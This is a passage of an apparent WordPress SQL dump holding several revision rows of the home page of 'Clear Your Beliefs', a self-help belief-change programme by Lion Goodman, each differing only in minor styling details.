your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:32:59', '2014-11-11 23:32:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1674, 2, '2014-11-11 18:34:12', '2014-11-11 23:34:12', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 50px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 16px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:34:12', '2014-11-11 23:34:12', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1675, 2, '2014-11-11 18:36:01', '2014-11-11 23:36:01', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:30px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 50px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 14px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:36:01', '2014-11-11 23:36:01', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1676, 2, '2014-11-11 18:37:04', '2014-11-11 23:37:04', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 50px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 14px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:37:04', '2014-11-11 23:37:04', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1677, 2, '2014-11-11 18:38:08', '2014-11-11 23:38:08', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 8px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:38:08', '2014-11-11 23:38:08', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1679, 2, '2014-11-11 18:49:20', '2014-11-11 23:49:20', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;width: 1035px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="641" height="155" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 18:49:20', '2014-11-11 23:49:20', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1681, 2, '2014-11-11 19:01:25', '2014-11-12 00:01:25', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;width: 1035px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png">\n<p style="text-align: center;margin-top: 8px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" 